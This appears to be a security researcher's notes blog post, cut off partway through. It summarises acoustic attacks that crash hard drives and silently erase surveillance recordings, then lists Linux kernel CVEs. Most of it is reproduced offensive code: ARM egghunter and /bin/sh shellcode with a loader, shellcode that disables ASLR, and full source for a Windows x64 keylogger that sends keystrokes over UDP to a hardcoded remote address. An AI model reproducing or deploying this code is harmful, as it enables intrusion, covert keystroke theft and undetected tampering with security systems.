Sunday, December 30, 2018
HDD Microphone
https://github.com/ortegaalfredo/kscope.git
hdd-killer: python script that emits a sound sweep to find the resonant frequency that interferes with the specified HDD. Video demo: https://www.youtube.com/watch?v=8DdqTz3CW5Y
use sound to crash drones by affecting gyroscopic sensor
utilizing the induction of magnetic sensors,
the researchers were able to apply side-channel attacks
for anti-lock braking systems
how to use
electromagnetic interference to inject signals into analog sensors
Audible waves vibrate the read/write head
and platters; ultrasonic waves alter the output of the HDD’s
shock sensor, intentionally causing the head to park.
Y. Michalevsky, D. Boneh, and G. Nakibly,
“Gyrophone: Recognizing Speech from Gyroscope Signals.”
in USENIX Security, 2014, pp. 1053–1067
============
Video Surveillance System Attack - live-feed without detection
============
Attacked system
Ezviz 720p 4-channel video surveillance system
stock Western Digital 3.5” Purple 1 TB
operating system on an on-board flash chip
speaker hangs from the ceiling, resting 10 cm directly
above the video surveillance system’s HDD
The system was subject to the malicious signal for increasing durations (60-180s)
- a 6,900 Hz sinusoidal signal at 120 dB SPL
- we monitored the system manually by looking at the live video feed from the system.
After the concluding the experiment, we examined the recordings from the HDD.
For all tests observer did not notice any abnormalities in the live video stream,
but attack durations longer than 12 seconds caused video loss recorded on the HDD.
Recordings from periods of interference
-less than 105 seconds exhibited video loss from about 12 seconds after being subjected to acoustic induced vibration until the vibration subsided.
In contrast, interference for periods of 105 seconds or longer resulted in video loss
from the beginning of the vibration until the device was restarted
In the case that a victim user is not physically near the system being attacked,
an adversary can use any frequency to attack the system.
The system’s live camera stream never displays indication of an attack.
Also the system does not provide any method to learn of audio in the environment.
Thus, if a victim user were not physically near the system,
an adversary can use audible signals while remaining undetected.
========================================================================
setup generates audible frequencies using
a Tektronix AFG3251 function generator, Yamaha R-S201 audio receiver,
a Pyramid Titanium Bullet Tweeter speaker
setup generates ultrasonic frequencies
a Keysight N5172B EXG X-Series RF Vector Signal Generator,
a CRY584 Power Amplifier, and a NU C Series Ultrasonic Sensor.
The setup measures the emitter’s actual output
using a CRY343 microphone and a RIGOL DS4022 oscilloscope
========================================================================
Linux Kernel - Vulnerabilities published - 2nd half 11/2018
Linux Kernel CVE-2018-19406 Local Denial of Service Vulnerability
2018-11-20
http://www.securityfocus.com/bid/105988
Linux Kernel CVE-2018-19407 Local Denial of Service Vulnerability
2018-11-20
http://www.securityfocus.com/bid/105987
Linux Kernel CVE-2018-16862 Local Security Bypass Vulnerability
2018-11-24
http://www.securityfocus.com/bid/106009
Linux Kernel CVE-2018-18955 Local Privilege Escalation Vulnerability
2018-11-16
http://www.securityfocus.com/bid/105941
RaspberyPi Egghunter execve NULL shellcode
# Title: Linux/ARM - sigaction() Based Egghunter (PWN!) + execve("/bin/sh", NULL, NULL) Shellcode (52 Bytes)
# Date: 2018-09-24
# Tested: armv7l (Raspberry Pi 3 Model B+)
# Author: Ken Kitahara
[System Information]
pi@raspberrypi:~ $ uname -a
Linux raspberrypi 4.14.52-v7+ #1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux
pi@raspberrypi:~ $ lsb_release -a
No LSB modules are available.
Distributor ID: Raspbian
Description: Raspbian GNU/Linux 9.4 (stretch)
Release: 9.4
Codename: stretch
pi@raspberrypi:~ $
[Procedure]
(1) Create main shellcode in THUMB state. This PoC's example is execve("/bin/sh", NULL, NULL) shellcode. (20 Bytes)
pi@raspberrypi:~ $ cat shell.s
.section .text
.global _start
_start:
.THUMB
// execve("/bin/sh", NULL, NULL)
adr r0, spawn
eor r1, r1, r1
eor r2, r2, r2
strb r2, [r0, #endline-spawn-1]
mov r7, #11
svc #1
spawn:
.ascii "/bin/shX"
endline:
pi@raspberrypi:~ $ as -o shell.o shell.s && ld -N -o shell shell.o
pi@raspberrypi:~ $ objcopy -O binary shell shell.bin
pi@raspberrypi:~ $ hexdump -v -e '"\\""x" 1/1 "%02x" ""' shell.bin && echo
\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x58
pi@raspberrypi:~ $
(2) Create egghunting shellcode. (52 Bytes)
pi@raspberrypi:~ $ cat egghunter.s
.section .text
.global _start
_start:
.ARM
add lr, pc, #1
bx lr
.THUMB
eor r1, r1, r1
mov r3, #0xff
page_align:
orr r1, r3
ldr r4, egg
next_addr:
mov r7, #0x43
add r1, r1, #1
svc #1
sub r7, r7, #0x51
cmp r0, r7
beq page_align
ldr r2, [r1]
cmp r2, r4
bne next_addr
add r1, #4
ldr r2, [r1]
cmp r2, r4
bne next_addr
add r1, #4
mov pc, r1
eor r7, r7, r7
egg:
.ascii "PWN!"
pi@raspberrypi:~ $ as -o egghunter.o egghunter.s && ld -N -o egghunter egghunter.o
pi@raspberrypi:~ $ objcopy -O binary egghunter egghunter.bin
pi@raspberrypi:~ $ hexdump -v -e '"\\""x" 1/1 "%02x" ""' egghunter.bin && echo
\x01\xe0\x8f\xe2\x1e\xff\x2f\xe1\x49\x40\xff\x23\x19\x43\x08\x4c\x43\x27\x01\x31\x01\xdf\x51\x3f\xb8\x42\xf7\xd0\x0a\x68\xa2\x42\xf6\xd1\x04\x31\x0a\x68\xa2\x42\xf2\xd1\x04\x31\x8f\x46\x7f\x40\x50\x57\x4e\x21
pi@raspberrypi:~ $
[Operation Test]
pi@raspberrypi:~ $ gcc -fno-stack-protector -z execstack loader.c -o loader
pi@raspberrypi:~ $ ./loader
Egghunting Shellcode Length: 52
Shellcode Length: 28
$ id
uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),997(gpio),998(i2c),999(spi)
$ exit
pi@raspberrypi:~ $
*/
#include
#include
unsigned char shell[] = \
// Egg Tag (4 Bytes * 2)
"PWN!PWN!"
// execve("/bin/sh", NULL, NULL) Shellcode (20 Bytes)
"\x02\xa0\x49\x40\x52\x40\xc2\x71"
"\x0b\x27\x01\xdf\x2f\x62\x69\x6e"
"\x2f\x73\x68\x58";
// Egghunting Shellcode (52 Bytes)
unsigned char sc[] = \
"\x01\xe0\x8f\xe2\x1e\xff\x2f\xe1"
"\x49\x40\xff\x23\x19\x43\x08\x4c"
"\x43\x27\x01\x31\x01\xdf\x51\x3f"
"\xb8\x42\xf7\xd0\x0a\x68\xa2\x42"
"\xf6\xd1\x04\x31\x0a\x68\xa2\x42"
"\xf2\xd1\x04\x31\x8f\x46\x7f\x40"
"\x50\x57\x4e\x21";
void main()
{
printf("Egghunting Shellcode Length: %d\n", strlen(sc));
printf("Shellcode Length: %d\n", strlen(shell));
int (*ret)() = (int(*)())sc;
ret();
}
shellcode ASLR disable
ASLR (Address Space Layout Randomization) Disable Shellcode Language C & ASM - Linux/x86_64
Author : Kağan Çapar
contact: kagancapar@gmail.com
shellcode len : 93 bytes
compilation: gcc -fno-stack-protector -z execstack [.c] -o []
Test:
run shellcode (./aslr etc.)
check : cat /proc/sys/kernel/randomize_va_space
you will see "0"
Assembly:
global _start
section .ASLR
_start:
#6A3B push byte +0x3b
#58 pop eax
#99 cdq
#48 dec eax
#BB2F62696E mov ebx,0x6e69622f
#2F das
#7368 jnc 0x75
#005348 add [ebx+0x48],dl
#89E7 mov edi,esp
#682D630000 push dword 0x632d
#48 dec eax
#89E6 mov esi,esp
#52 push edx
#E836000000 call 0x56
#6563686F arpl [gs:eax+0x6f],bp
#2030 and [eax],dh
#207C2073 and [eax+0x73],bh
#7564 jnz 0x90
#6F outsd
#20746565 and [ebp+0x65],dh
#202F and [edi],ch
#7072 jo 0xa7
#6F outsd
#632F arpl [edi],bp
#7379 jnc 0xb3
#732F jnc 0x6b
#6B65726E imul esp,[ebp+0x72],byte +0x6e
#656C gs insb
#2F das
#7261 jc 0xa6
#6E outsb
#646F fs outsd
#6D insd
#697A655F76615F imul edi,[edx+0x65],dword 0x5f61765f
#7370 jnc 0xc2
#61 popa
#636500 arpl [ebp+0x0],sp
#56 push esi
#57 push edi
#48 dec eax
#89E6 mov esi,esp
#0F05 syscall
*/
#include
#include
unsigned char ASLR[] = \
"\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53"
"\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8\x36\x00"
"\x00\x00\x65\x63\x68\x6f\x20\x30\x20\x7c\x20\x73\x75\x64\x6f"
"\x20\x74\x65\x65\x20\x2f\x70\x72\x6f\x63\x2f\x73\x79\x73\x2f"
"\x6b\x65\x72\x6e\x65\x6c\x2f\x72\x61\x6e\x64\x6f\x6d\x69\x7a"
"\x65\x5f\x76\x61\x5f\x73\x70\x61\x63\x65\x00\x56\x57\x48\x89"
"\xe6\x0f\x05";
int main()
{
printf("Shellcode len: %d\n", strlen(ASLR));
int (*ret)() = (int(*)())ASLR;
ret();
}
shellcode generator for win x64 remote keylogger
# Title : Windows x64 Remote Keylogger (UDP)
# size : 864 bytes
# Author : Roziul Hasan Khan Shifat
# Tested On : Windows 10 x64 pro
# Date : 26-10-2018
# Email: shifath12@gmail.com
*/
/*
keyl.obj: file format pe-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
0: eb 1d jmp 1f
0000000000000002 <_init_>:
2: 48 31 d2 xor rdx,rdx
5: 65 48 8b 42 60 mov rax,QWORD PTR gs:[rdx+0x60]
a: 48 8b 40 18 mov rax,QWORD PTR [rax+0x18]
e: 48 8b 40 20 mov rax,QWORD PTR [rax+0x20]
12: 48 8b 30 mov rsi,QWORD PTR [rax]
15: 48 8b 06 mov rax,QWORD PTR [rsi]
18: 48 8b 70 20 mov rsi,QWORD PTR [rax+0x20]
1c: 5b pop rbx
1d: 53 push rbx
1e: c3 ret
000000000000001f
1f: e8 de ff ff ff call 2 <_init_>
0000000000000024 <_p2_>:
24: 52 push rdx
25: 52 push rdx
26: 4c 8d 3c 24 lea r15,[rsp]
2a: 48 83 ec 38 sub rsp,0x38
2e: 4c 8d 24 24 lea r12,[rsp]
32: 48 83 ec 58 sub rsp,0x58
36: 48 8d 3c 24 lea rdi,[rsp]
3a: 41 57 push r15
3c: 41 54 push r12
3e: 57 push rdi
3f: 48 b8 48 45 52 45 49 movabs rax,0x5349544945524548
46: 54 49 53
49: 50 push rax
4a: 48 31 c0 xor rax,rax
4d: 66 b8 cc 01 mov ax,0x1cc
51: 48 01 c3 add rbx,rax
54: 53 push rbx
55: 48 89 f1 mov rcx,rsi
58: 48 8d 93 6e ff ff ff lea rdx,[rbx-0x92]
5f: 4d 31 c0 xor r8,r8
62: 41 b0 02 mov r8b,0x2
65: 49 89 f9 mov r9,rdi
68: ff d3 call rbx
6a: 41 5d pop r13
6c: 48 31 c0 xor rax,rax
6f: 50 push rax
70: 50 push rax
71: 48 b8 77 73 32 5f 33 movabs rax,0x642e32335f327377
78: 32 2e 64
7b: 48 89 04 24 mov QWORD PTR [rsp],rax
7f: 66 c7 44 24 08 6c 6c mov WORD PTR [rsp+0x8],0x6c6c
86: 48 8d 0c 24 lea rcx,[rsp]
8a: 48 8b 77 08 mov rsi,QWORD PTR [rdi+0x8]
8e: 48 83 ec 28 sub rsp,0x28
92: ff d6 call rsi
94: 48 96 xchg rsi,rax
96: 48 8d 4c 24 28 lea rcx,[rsp+0x28]
9b: c7 01 75 73 65 72 mov DWORD PTR [rcx],0x72657375
a1: ff d0 call rax
a3: 48 89 c1 mov rcx,rax
a6: 49 8d 55 8c lea rdx,[r13-0x74]
aa: 4d 31 c0 xor r8,r8
ad: 41 b0 06 mov r8b,0x6
b0: 4c 8d 4f 10 lea r9,[rdi+0x10]
b4: 41 ff d5 call r13
b7: 48 89 f1 mov rcx,rsi
ba: 49 8d 55 e7 lea rdx,[r13-0x19]
be: 4d 31 c0 xor r8,r8
c1: 41 b0 03 mov r8b,0x3
c4: 4c 8d 4f 40 lea r9,[rdi+0x40]
c8: 41 ff d5 call r13
cb: 48 83 c4 38 add rsp,0x38
00000000000000cf <_p3_>:
cf: 48 31 c9 xor rcx,rcx
d2: 66 b9 98 01 mov cx,0x198
d6: 48 29 cc sub rsp,rcx
d9: 48 83 c1 6a add rcx,0x6a
dd: 48 8d 14 24 lea rdx,[rsp]
e1: 48 8b 5f 40 mov rbx,QWORD PTR [rdi+0x40]
e5: ff d3 call rbx
e7: 48 31 c9 xor rcx,rcx
ea: b1 02 mov cl,0x2
ec: 51 push rcx
ed: 51 push rcx
ee: 5a pop rdx
ef: 41 58 pop r8
f1: 41 b0 11 mov r8b,0x11
f4: 48 8b 5f 48 mov rbx,QWORD PTR [rdi+0x48]
f8: ff d3 call rbx
fa: 48 89 47 08 mov QWORD PTR [rdi+0x8],rax
fe: 48 8b 1f mov rbx,QWORD PTR [rdi]
101: 48 31 c9 xor rcx,rcx
104: ff d3 call rbx
106: 41 c6 07 02 mov BYTE PTR [r15],0x2
10a: 66 41 c7 47 02 db 83 mov WORD PTR [r15+0x2],0x83db
111: 41 c7 47 04 c1 a1 c1 mov DWORD PTR [r15+0x4],0x63c1a1c1
118: 63
119: 4d 31 c9 xor r9,r9
11c: 41 51 push r9
11e: 41 51 push r9
120: 59 pop rcx
121: 5a pop rdx
122: b1 0d mov cl,0xd
124: 49 89 c0 mov r8,rax
127: b2 bc mov dl,0xbc
129: 4c 01 ea add rdx,r13
12c: 48 8b 5f 10 mov rbx,QWORD PTR [rdi+0x10]
130: ff d3 call rbx
0000000000000132 <_p4_>:
132: 49 8d 4c 24 08 lea rcx,[r12+0x8]
137: 48 31 d2 xor rdx,rdx
13a: 52 push rdx
13b: 52 push rdx
13c: 41 58 pop r8
13e: 41 59 pop r9
140: 48 8b 5f 28 mov rbx,QWORD PTR [rdi+0x28]
144: ff d3 call rbx
146: 49 8d 4c 24 08 lea rcx,[r12+0x8]
14b: 48 8b 5f 30 mov rbx,QWORD PTR [rdi+0x30]
14f: ff d3 call rbx
151: 49 8d 4c 24 08 lea rcx,[r12+0x8]
156: 48 8b 5f 38 mov rbx,QWORD PTR [rdi+0x38]
15a: ff d3 call rbx
15c: eb d4 jmp 132 <_p4_>
000000000000015e
15e: 47 rex.RXB
15f: 65 74 4d gs je 1af
162: 6f outs dx,DWORD PTR ds:[rsi]
163: 64 75 6c fs jne 1d2
166: 65 48 61 gs rex.W (bad)
169: 6e outs dx,BYTE PTR ds:[rsi]
16a: 64 6c fs ins BYTE PTR es:[rdi],dx
16c: 65 41 01 4c 6f 61 add DWORD PTR gs:[r15+rbp*2+0x61],ecx
172: 64 4c 69 62 72 61 72 imul r12,QWORD PTR fs:[rdx+0x72],0x41797261
179: 79 41
17b: 01 53 65 add DWORD PTR [rbx+0x65],edx
000000000000017c
17c: 53 push rbx
17d: 65 74 57 gs je 1d7
180: 69 6e 64 6f 77 73 48 imul ebp,DWORD PTR [rsi+0x64],0x4873776f
187: 6f outs dx,DWORD PTR ds:[rsi]
188: 6f outs dx,DWORD PTR ds:[rsi]
189: 6b 45 78 41 imul eax,DWORD PTR [rbp+0x78],0x41
18d: 01 43 61 add DWORD PTR [rbx+0x61],eax
190: 6c ins BYTE PTR es:[rdi],dx
191: 6c ins BYTE PTR es:[rdi],dx
192: 4e rex.WRX
193: 65 78 74 gs js 20a
196: 48 6f rex.W outs dx,DWORD PTR ds:[rsi]
198: 6f outs dx,DWORD PTR ds:[rsi]
199: 6b 45 78 01 imul eax,DWORD PTR [rbp+0x78],0x1
19d: 47 rex.RXB
19e: 65 74 4b gs je 1ec
1a1: 65 79 53 gs jns 1f7
1a4: 74 61 je 207
1a6: 74 65 je 20d
1a8: 01 47 65 add DWORD PTR [rdi+0x65],eax
1ab: 74 4d je 1fa
1ad: 65 73 73 gs jae 223
1b0: 61 (bad)
1b1: 67 65 41 01 54 72 61 add DWORD PTR gs:[r10d+esi*2+0x61],edx
1b8: 6e outs dx,BYTE PTR ds:[rsi]
1b9: 73 6c jae 227
1bb: 61 (bad)
1bc: 74 65 je 223
1be: 4d rex.WRB
1bf: 65 73 73 gs jae 235
1c2: 61 (bad)
1c3: 67 65 01 44 69 73 add DWORD PTR gs:[ecx+ebp*2+0x73],eax
1c9: 70 61 jo 22c
1cb: 74 63 je 230
1cd: 68 4d 65 73 73 push 0x7373654d
1d2: 61 (bad)
1d3: 67 65 41 01 57 53 add DWORD PTR gs:[r15d+0x53],edx
00000000000001d7
1d7: 57 push rdi
1d8: 53 push rbx
1d9: 41 53 push r11
1db: 74 61 je 23e
1dd: 72 74 jb 253
1df: 75 70 jne 251
1e1: 01 73 6f add DWORD PTR [rbx+0x6f],esi
1e4: 63 6b 65 movsxd ebp,DWORD PTR [rbx+0x65]
1e7: 74 01 je 1ea
1e9: 73 65 jae 250
1eb: 6e outs dx,BYTE PTR ds:[rsi]
1ec: 64 74 6f fs je 25e
1ef: 01 56 57 add DWORD PTR [rsi+0x57],edx
00000000000001f0
1f0: 56 push rsi
1f1: 57 push rdi
1f2: 41 50 push r8
1f4: 52 push rdx
1f5: 41 51 push r9
1f7: 51 push rcx
1f8: 41 5b pop r11
1fa: 48 31 db xor rbx,rbx
1fd: 53 push rbx
1fe: 53 push rbx
1ff: 5a pop rdx
200: 58 pop rax
201: 8b 59 3c mov ebx,DWORD PTR [rcx+0x3c]
204: 48 01 cb add rbx,rcx
207: b2 88 mov dl,0x88
209: 8b 04 13 mov eax,DWORD PTR [rbx+rdx*1]
20c: 48 01 c8 add rax,rcx
20f: 48 31 d2 xor rdx,rdx
212: 52 push rdx
213: 52 push rdx
214: 52 push rdx
215: 41 58 pop r8
217: 41 59 pop r9
219: 41 5a pop r10
21b: 44 8b 40 20 mov r8d,DWORD PTR [rax+0x20]
21f: 4d 01 d8 add r8,r11
222: 44 8b 48 24 mov r9d,DWORD PTR [rax+0x24]
226: 4d 01 d9 add r9,r11
229: 44 8b 50 1c mov r10d,DWORD PTR [rax+0x1c]
22d: 4d 01 da add r10,r11
230: 48 31 d2 xor rdx,rdx
233: 48 31 f6 xor rsi,rsi
236: 56 push rsi
237: 59 pop rcx
238: 41 8b 34 90 mov esi,DWORD PTR [r8+rdx*4]
23c: 4c 01 de add rsi,r11
23f: 48 8b 7c 24 08 mov rdi,QWORD PTR [rsp+0x8]
244: 48 31 c0 xor rax,rax
247: 8a 04 0f mov al,BYTE PTR [rdi+rcx*1]
24a: 48 ff c1 inc rcx
24d: 3c 01 cmp al,0x1
24f: 75 f6 jne 247
251: 48 ff c2 inc rdx
254: 51 push rcx
255: 48 ff c9 dec rcx
258: 48 87 f7 xchg rdi,rsi
25b: f3 a6 repz cmps BYTE PTR ds:[rsi],BYTE PTR es:[rdi]
25d: 59 pop rcx
25e: 75 d3 jne 233
260: 48 ff ca dec rdx
263: 48 8b 7c 24 08 mov rdi,QWORD PTR [rsp+0x8]
268: 48 01 cf add rdi,rcx
26b: 48 89 7c 24 08 mov QWORD PTR [rsp+0x8],rdi
270: 48 31 db xor rbx,rbx
273: 53 push rbx
274: 58 pop rax
275: 66 41 8b 1c 51 mov bx,WORD PTR [r9+rdx*2]
27a: 41 8b 04 9a mov eax,DWORD PTR [r10+rbx*4]
27e: 4c 01 d8 add rax,r11
281: 48 8b 1c 24 mov rbx,QWORD PTR [rsp]
285: 48 89 03 mov QWORD PTR [rbx],rax
288: 48 83 c3 08 add rbx,0x8
28c: 48 89 1c 24 mov QWORD PTR [rsp],rbx
290: 48 8b 5c 24 10 mov rbx,QWORD PTR [rsp+0x10]
295: 48 ff cb dec rbx
298: 48 89 5c 24 10 mov QWORD PTR [rsp+0x10],rbx
29d: 48 31 d2 xor rdx,rdx
2a0: 48 39 d3 cmp rbx,rdx
2a3: 75 8e jne 233
2a5: 48 83 c4 18 add rsp,0x18
2a9: 5f pop rdi
2aa: 5e pop rsi
2ab: c3 ret
00000000000002ac <_proceed_>:
2ac: 48 83 ec 58 sub rsp,0x58
2b0: 41 50 push r8
2b2: 52 push rdx
2b3: 51 push rcx
2b4: 48 31 f6 xor rsi,rsi
2b7: 48 b8 48 45 52 45 49 movabs rax,0x5349544945524548
2be: 54 49 53
00000000000002c1
2c1: 4c 8b 14 34 mov r10,QWORD PTR [rsp+rsi*1]
2c5: 48 ff c6 inc rsi
2c8: 49 39 c2 cmp r10,rax
2cb: 75 f4 jne 2c1
2cd: 48 83 c6 07 add rsi,0x7
2d1: 48 8d 1c 34 lea rbx,[rsp+rsi*1]
2d5: 48 8b 3b mov rdi,QWORD PTR [rbx]
2d8: 4c 8b 63 08 mov r12,QWORD PTR [rbx+0x8]
2dc: 4c 8b 7b 10 mov r15,QWORD PTR [rbx+0x10]
2e0: 48 85 c9 test rcx,rcx
2e3: 75 68 jne 34d <_out_>
2e5: 48 31 db xor rbx,rbx
2e8: b3 01 mov bl,0x1
2ea: 48 c1 e3 08 shl rbx,0x8
2ee: 48 39 da cmp rdx,rbx
2f1: 75 5a jne 34d <_out_>
2f3: 48 8b 5f 20 mov rbx,QWORD PTR [rdi+0x20]
2f7: 48 31 c9 xor rcx,rcx
2fa: b1 14 mov cl,0x14
2fc: ff d3 call rbx
2fe: 66 41 89 04 24 mov WORD PTR [r12],ax
303: 48 8b 5f 20 mov rbx,QWORD PTR [rdi+0x20]
307: 48 31 c9 xor rcx,rcx
30a: b1 10 mov cl,0x10
30c: ff d3 call rbx
30e: 66 41 89 44 24 02 mov WORD PTR [r12+0x2],ax
314: 48 8b 5c 24 10 mov rbx,QWORD PTR [rsp+0x10]
319: 8b 03 mov eax,DWORD PTR [rbx]
31b: 41 89 44 24 04 mov DWORD PTR [r12+0x4],eax
320: 48 83 ec 58 sub rsp,0x58
324: 48 8b 4f 08 mov rcx,QWORD PTR [rdi+0x8]
328: 41 54 push r12
32a: 5a pop rdx
32b: 4d 31 c9 xor r9,r9
32e: 41 51 push r9
330: 41 58 pop r8
332: 41 b0 10 mov r8b,0x10
335: 4c 89 7c 24 20 mov QWORD PTR [rsp+0x20],r15
33a: 4c 89 44 24 28 mov QWORD PTR [rsp+0x28],r8
33f: 49 83 e8 08 sub r8,0x8
343: 48 8b 5f 50 mov rbx,QWORD PTR [rdi+0x50]
347: ff d3 call rbx
349: 48 83 c4 58 add rsp,0x58
000000000000034d <_out_>:
34d: 5a pop rdx
34e: 41 58 pop r8
350: 41 59 pop r9
352: 48 8b 5f 18 mov rbx,QWORD PTR [rdi+0x18]
356: 48 31 c9 xor rcx,rcx
359: ff d3 call rbx
35b: 48 83 c4 58 add rsp,0x58
35f: c3 ret
*/
/*
section .text
global _start
_start:
jmp short p1
_init_:
xor rdx,rdx
mov rax,[gs:rdx+0x60] ; getting pointer of PEB structure
mov rax,[rax+24] ;rax=PPEB->Ldr
mov rax,[rax+32] ;Ldr->InMemoryOrderModuleList
mov rsi,[rax]
mov rax,[rsi]
mov rsi,[rax+32] ;kernel32.dll base address
pop rbx ;address of _p2_
push rbx
ret; transferring execution control to _p2_
p1:
call _init_
;-----------------------------------------------------------------------------------------------------
_p2_:
push rdx
push rdx
lea r15,[rsp]
sub rsp,56
lea r12,[rsp] ; pointer important data (2 short int + 1 DWORD + 48 byte MSG structure )
sub rsp,88
lea rdi,[rsp] ; pointer to function address
push r15
push r12
push rdi
mov rax,'HEREITIS'
push rax
xor rax,rax
mov ax,get_addr-_p2_
add rbx,rax ; address of get_addr
push rbx ;reserving future use
mov rcx,rsi
lea rdx,[rbx-(get_addr-kernel32_func)]
xor r8,r8
mov r8b,2
mov r9,rdi
call rbx ;loading kernel32_func functions
;-------------------------------------------------------------------------------------
pop r13 ;address of get_addr
;loading ws2_32.dll
xor rax,rax
push rax
push rax
mov rax,'ws2_32.d'
mov [rsp],rax
mov [rsp+8],word 'll'
lea rcx,[rsp]
mov rsi,[rdi+8]
sub rsp,40
call rsi
xchg rsi,rax
;----------------------------------------------------------
;loading user32.dll
lea rcx,[rsp+40]
mov [rcx],dword 'user'
call rax
;====================================
;loading user32.dll functions
mov rcx,rax
lea rdx,[r13-(get_addr-user32_func)]
xor r8,r8
mov r8b,6
lea r9,[rdi+16] ;user32.dll functions from 16
call r13
;===================================
;loading ws2_32.dll functions
mov rcx,rsi
lea rdx,[r13-(get_addr-ws2_32_func)]
xor r8,r8
mov r8b,3
lea r9,[rdi+64] ;ws2_32.dll functions from 64
call r13
add rsp,56
;===========================================All necessary functions are loaded. Time to proceed to main task ========================================
_p3_:
xor rcx,rcx
mov cx,408
sub rsp,rcx
add rcx,106
lea rdx,[rsp]
mov rbx,[rdi+64] ;WSAStartup()
call rbx
xor rcx,rcx
mov cl,2
push rcx
push rcx
pop rdx
pop r8
mov r8b,17
mov rbx,[rdi+72] ;socket()
call rbx
mov [rdi+8],rax ;SOCKET
mov rbx,[rdi] ; GetModuleHandleA()
xor rcx,rcx
call rbx
;------------------------------------
mov [r15],byte 2
mov [r15+2],word 0x83db ;port change it
mov [r15+4],dword 0x63c1a1c1 ;IP change it
;-----------------------------------
xor r9,r9
push r9
push r9
pop rcx
pop rdx
mov cl,13
mov r8,rax
mov dl,_proceed_-get_addr
add rdx,r13
mov rbx,[rdi+16] ;SetWindowsHookExA()
call rbx
_p4_:
lea rcx,[r12+8]
xor rdx,rdx
push rdx
push rdx
pop r8
pop r9
mov rbx,[rdi+40] ;GetMessageA()
call rbx
lea rcx,[r12+8]
mov rbx,[rdi+48] ;TranslateMessage()
call rbx
lea rcx,[r12+8]
mov rbx,[rdi+56] ;DispatchMessageA()
call rbx
jmp short _p4_
;----------------------------------------------------------------------------------------
kernel32_func:
db 'GetModuleHandleA',1,'LoadLibraryA',1
user32_func:
db 'SetWindowsHookExA',1,'CallNextHookEx',1,'GetKeyState',1,'GetMessageA',1,'TranslateMessage',1,'DispatchMessageA',1
ws2_32_func:
db 'WSAStartup',1,'socket',1,'sendto',1
get_addr: ; rcx=dll base , rdx=function name string address , r8=number of functions , r9=address of buffer
db 0x56,0x57,0x41,0x50,0x52,0x41,0x51,0x51,0x41,0x5b,0x48,0x31,0xdb,0x53,0x53,0x5a,0x58,0x8b,0x59,0x3c,0x48,0x01,0xcb,0xb2,0x88,0x8b,0x04,0x13,0x48,0x01,0xc8,0x48,0x31,0xd2,0x52,0x52,0x52,0x41,0x58,0x41,0x59,0x41,0x5a,0x44,0x8b,0x40,0x20,0x4d,0x01,0xd8,0x44,0x8b,0x48,0x24,0x4d,0x01,0xd9,0x44,0x8b,0x50,0x1c,0x4d,0x01,0xda,0x48,0x31,0xd2,0x48,0x31,0xf6,0x56,0x59,0x41,0x8b,0x34,0x90,0x4c,0x01,0xde,0x48,0x8b,0x7c,0x24,0x08,0x48,0x31,0xc0,0x8a,0x04,0x0f,0x48,0xff,0xc1,0x3c,0x01,0x75,0xf6,0x48,0xff,0xc2,0x51,0x48,0xff,0xc9,0x48,0x87,0xf7,0xf3,0xa6,0x59,0x75,0xd3,0x48,0xff,0xca,0x48,0x8b,0x7c,0x24,0x08,0x48,0x01,0xcf,0x48,0x89,0x7c,0x24,0x08,0x48,0x31,0xdb,0x53,0x58,0x66,0x41,0x8b,0x1c,0x51,0x41,0x8b,0x04,0x9a,0x4c,0x01,0xd8,0x48,0x8b,0x1c,0x24,0x48,0x89,0x03,0x48,0x83,0xc3,0x08,0x48,0x89,0x1c,0x24,0x48,0x8b,0x5c,0x24,0x10,0x48,0xff,0xcb,0x48,0x89,0x5c,0x24,0x10,0x48,0x31,0xd2,0x48,0x39,0xd3,0x75,0x8e,0x48,0x83,0xc4,0x18,0x5f,0x5e,0xc3
;-------------------------------------------------------------------------------------------------------------------
_proceed_:
sub rsp,88
push r8
push rdx
push rcx
;---------------------------------------------
xor rsi,rsi
mov rax,'HEREITIS'
find:
mov r10,[rsp+rsi]
inc rsi
cmp r10,rax
jne find
add rsi,7
lea rbx,[rsp+rsi]
mov rdi,[rbx]
mov r12,[rbx+8]
mov r15,[rbx+16]
;------------------------------------------------
test rcx,rcx
jnz short _out_
xor rbx,rbx
mov bl,1
shl rbx,8
cmp rdx,rbx
jne short _out_
;--------------------------------------------------------
mov rbx,[rdi+32] ;GetKeyState(VK_CAPITAL)
xor rcx,rcx
mov cl,0x14
call rbx
mov [r12],ax
mov rbx,[rdi+32] ;GetKeyState(VK_SHIFT)
xor rcx,rcx
mov cl,0x10
call rbx
mov [r12+2],ax
;-------------------------------
;sending keystrokes
mov rbx,[rsp+16]
mov eax,[rbx]
mov [r12+4],eax ;Virtual key code
sub rsp,88
mov rcx,[rdi+8] ;SOCKET
push r12
pop rdx
xor r9,r9
push r9
pop r8
mov r8b,16
mov [rsp+32],r15
mov [rsp+40],r8
sub r8,8
mov rbx,[rdi+80]
call rbx
add rsp,88
;-----------------------------------------------------------
_out_:
pop rdx
pop r8
pop r9
mov rbx,[rdi+24]
xor rcx,rcx
call rbx
add rsp,88
ret
*/
/*
//keylogger Handler
#include
#include
#include
#pragma pack(1)
typedef struct key
{
short caps;
short shift;
DWORD vkcode;
}KEYDATA;
char * Determine(BOOL caps,BOOL shift,DWORD code)
{
char * key;
switch (code) // SWITCH ON INT
{
case 0x41: key = caps ? (shift ? "a" : "A") : (shift ? "A" : "a"); break;
case 0x42: key = caps ? (shift ? "b" : "B") : (shift ? "B" : "b"); break;
case 0x43: key = caps ? (shift ? "c" : "C") : (shift ? "C" : "c"); break;
case 0x44: key = caps ? (shift ? "d" : "D") : (shift ? "D" : "d"); break;
case 0x45: key = caps ? (shift ? "e" : "E") : (shift ? "E" : "e"); break;
case 0x46: key = caps ? (shift ? "f" : "F") : (shift ? "F" : "f"); break;
case 0x47: key = caps ? (shift ? "g" : "G") : (shift ? "G" : "g"); break;
case 0x48: key = caps ? (shift ? "h" : "H") : (shift ? "H" : "h"); break;
case 0x49: key = caps ? (shift ? "i" : "I") : (shift ? "I" : "i"); break;
case 0x4A: key = caps ? (shift ? "j" : "J") : (shift ? "J" : "j"); break;
